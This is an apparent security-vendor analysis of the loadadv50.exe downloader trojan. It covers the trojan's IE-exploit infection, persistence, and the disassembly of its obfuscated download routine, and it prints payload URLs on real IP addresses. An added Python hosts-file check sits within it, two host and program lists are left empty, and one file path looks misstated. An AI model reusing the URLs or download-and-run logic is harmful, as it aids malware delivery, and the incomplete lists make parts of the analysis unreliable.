Competitive Malware Analysis

SecureWorks' research team has been tracking an emerging trend in malware: new malware increasingly destroys other malicious programs as part of its installation. No longer content to share the spoils of war, malware families now compete with each other for the lion's share of the prize. This is an analysis of a piece of malware in the Downloader.Trojan class. The executable is called loadadv50.exe. What follows is the method of infection and a run-down of what the executable does.

Method of Infection

This piece of malware combines two methods in order to infect the host computer. The first vulnerability is SimilarMethodNameRedir, an exploit that allows the malicious code to be executed in the Local zone. The second is the IE Drag-N-Drop exploit; however, instead of tricking the user into dragging an image, the attacker only needs the user to click on the image. The script then pops up a new window that has access to the Startup folder of the local system, which causes the host to run the executable on the next startup.

Details of the Executable

Once the executable starts it does a few cursory things, such as getting the command line that was used to invoke it, retrieving the startup info, and obtaining a handle to the program's heap to facilitate memory allocation.

Then the program loads a list of hosts that competing malware may be trying to connect to. This list includes:


It appears to store this list for future reference.

The next step it takes is to register itself as a service process so it will be restarted on each startup.

Next the program sleeps, after which it retrieves the location of the Windows directory. The sleep is part of a loop that the executable stays in while it polls for an Internet connection.

Once it finds that an Internet connection is available, it begins by testing whether it can write to the Windows directory: it attempts to write a file named "test" there and, after a successful attempt, continues on.

The program then crafts three URLs in code. It does this in a rather obfuscated manner: instead of storing each URL as a string in the data segment, the program builds it on the stack one byte at a time, as seen below:

    MOV DWORD PTR SS:[EBP-4],EBX
    MOV BYTE PTR SS:[EBP-44],68
    MOV BYTE PTR SS:[EBP-43],74
    MOV BYTE PTR SS:[EBP-42],74
    MOV BYTE PTR SS:[EBP-41],70
    MOV BYTE PTR SS:[EBP-40],3A
    MOV BYTE PTR SS:[EBP-3F],2F
    MOV BYTE PTR SS:[EBP-3E],2F
    MOV BYTE PTR SS:[EBP-3D],32
    MOV BYTE PTR SS:[EBP-3C],31
    MOV BYTE PTR SS:[EBP-3B],33
    MOV BYTE PTR SS:[EBP-3A],2E
    MOV BYTE PTR SS:[EBP-39],31
    MOV BYTE PTR SS:[EBP-38],35
    MOV BYTE PTR SS:[EBP-37],39
    MOV BYTE PTR SS:[EBP-36],2E
    MOV BYTE PTR SS:[EBP-35],31
    MOV BYTE PTR SS:[EBP-34],31
    MOV BYTE PTR SS:[EBP-33],37
    MOV BYTE PTR SS:[EBP-32],2E
    MOV BYTE PTR SS:[EBP-31],31
    MOV BYTE PTR SS:[EBP-30],33
    MOV BYTE PTR SS:[EBP-2F],33
    MOV BYTE PTR SS:[EBP-2E],2F
    MOV BYTE PTR SS:[EBP-2D],64
    MOV BYTE PTR SS:[EBP-2C],6B
    MOV BYTE PTR SS:[EBP-2B],70
    MOV BYTE PTR SS:[EBP-2A],72
    MOV BYTE PTR SS:[EBP-29],6F
    MOV BYTE PTR SS:[EBP-28],67
    MOV BYTE PTR SS:[EBP-27],73
    MOV BYTE PTR SS:[EBP-26],2F
    MOV BYTE PTR SS:[EBP-25],BL

In this version of the executable the URLs are:

    http://213.159.117.133/dkprogs/
    http://213.159.117.133/dl/
    http://67.19.51.10/enter/access2.asp?user=borodam

From these URLs it retrieves at least four files at the time of this writing: seksdialer.exe, toolbar.txt, systime.txt, and dktibs.php. It renames these to sex.exe, toolbar.exe, systime.exe and dktibs.exe respectively and places them in the Windows directory structure. It does so in a confusing manner, keeping the function pointer in a register and then calling through the register instead of calling the function directly, as follows:

    MOV ESI,DWORD PTR DS:[<&WININET.Internet>
    MOV EDI,400
    CMP DWORD PTR SS:[EBP-8],5
    JGE loaddadv.00401AD3
    PUSH EBX
    PUSH 80
    PUSH 4
    PUSH EBX
    PUSH 1
    PUSH 40000000
    PUSH loaddadv.00402390
    CALL DWORD PTR DS:[<&KERNEL32.CreateFil>
    PUSH EBX
    MOV DWORD PTR SS:[EBP+10],EAX
    PUSH EBX
    PUSH EBX
    LEA EAX,DWORD PTR SS:[EBP-1FC]
    PUSH EBX
    PUSH EAX
    CALL DWORD PTR DS:[<&WININET.InternetOp>
    PUSH EBX
    PUSH EBX
    PUSH EBX
    LEA ECX,DWORD PTR SS:[EBP-FC]
    PUSH EBX
    PUSH ECX
    PUSH EAX
    MOV DWORD PTR SS:[EBP+8],EAX
    CALL DWORD PTR DS:[<&WININET.InternetOp>
    LEA ECX,DWORD PTR SS:[EBP-4]
    MOV DWORD PTR SS:[EBP+C],EAX
    PUSH ECX
    LEA ECX,DWORD PTR SS:[EBP-5FC]
    PUSH EDI
    PUSH ECX
    PUSH EAX
    CALL ESI

The first instruction moves the address of the InternetReadFile function into the ESI register. The code then opens a file handle for writing. After that it opens a connection to the Internet. The final instruction listed here calls the function in ESI, which is InternetReadFile.

The program seems to do only modest error checking. It checks for the initial Internet connection, and afterwards only checks that the file seksdialer.exe was successfully obtained. If it was not obtained, it retries until it is successful.

After retrieving the files, it attempts to run them. If it is unable to do so, it exits. Since the file is in the Startup folder, it will try again on the next boot.

After this, the executable goes about removing competing executables. This list includes programs such as:


After removing these programs, it rewrites the hosts file in the Windows directory with the hosts from above. It does the same to the /drives/etc/hosts file.
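A defender checking for this kind of hosts-file rewrite can diff the file against a known-good baseline. The following is an added example, not part of the SecureWorks analysis; the sample hosts content, the placeholder rival domains and the assumption that the trojan pins those names to 127.0.0.1 are all constructed for illustration.

```python
import ipaddress

# Constructed sample of a hosts file after a rewrite of the kind described above:
# the stock localhost line survives, but rival domains (placeholder names, not the
# page's list) are pinned to 127.0.0.1 so competing malware cannot reach them.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       rival-downloader.example   # added by the trojan (constructed)
127.0.0.1       counter.rival-tgp.example
"""

# Known-good mappings for this host; anything else deserves a closer look.
BASELINE = {("127.0.0.1", "localhost"), ("::1", "localhost")}

def parse_hosts(text):
    """Return (ip, hostname) pairs, ignoring comments, blanks and malformed lines."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip trailing comments
        if not line:
            continue
        ip, *names = line.split()
        try:
            ipaddress.ip_address(ip)          # first field must be an IP literal
        except ValueError:
            continue
        pairs.extend((ip, name.lower()) for name in names)
    return pairs

def unexpected_entries(text, baseline=BASELINE):
    """Mappings absent from the baseline: sinkholed or redirected names show up here."""
    return [pair for pair in parse_hosts(text) if pair not in baseline]
```

On a live system the same check runs over the contents of the system hosts file instead of the constructed sample.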

That is the run-down of the executable in a nutshell. As a conjecture about the purpose of the anti-malware parts of this code, I would assume that it removes its competitors in order to stay better hidden. It seems to target programs that would be a stronger indicator that the host is infected, prompting the user to run a full scan of the host and possibly find this executable. The creator of this program did not want that to happen and so decided not to share.

Removal Instructions

The loadadv50.exe Trojan is detectable by most leading virus scanners. To remove this Trojan, simply update the virus scanner's signatures and perform a full system scan. If detected, follow the instructions provided by the virus scanner.
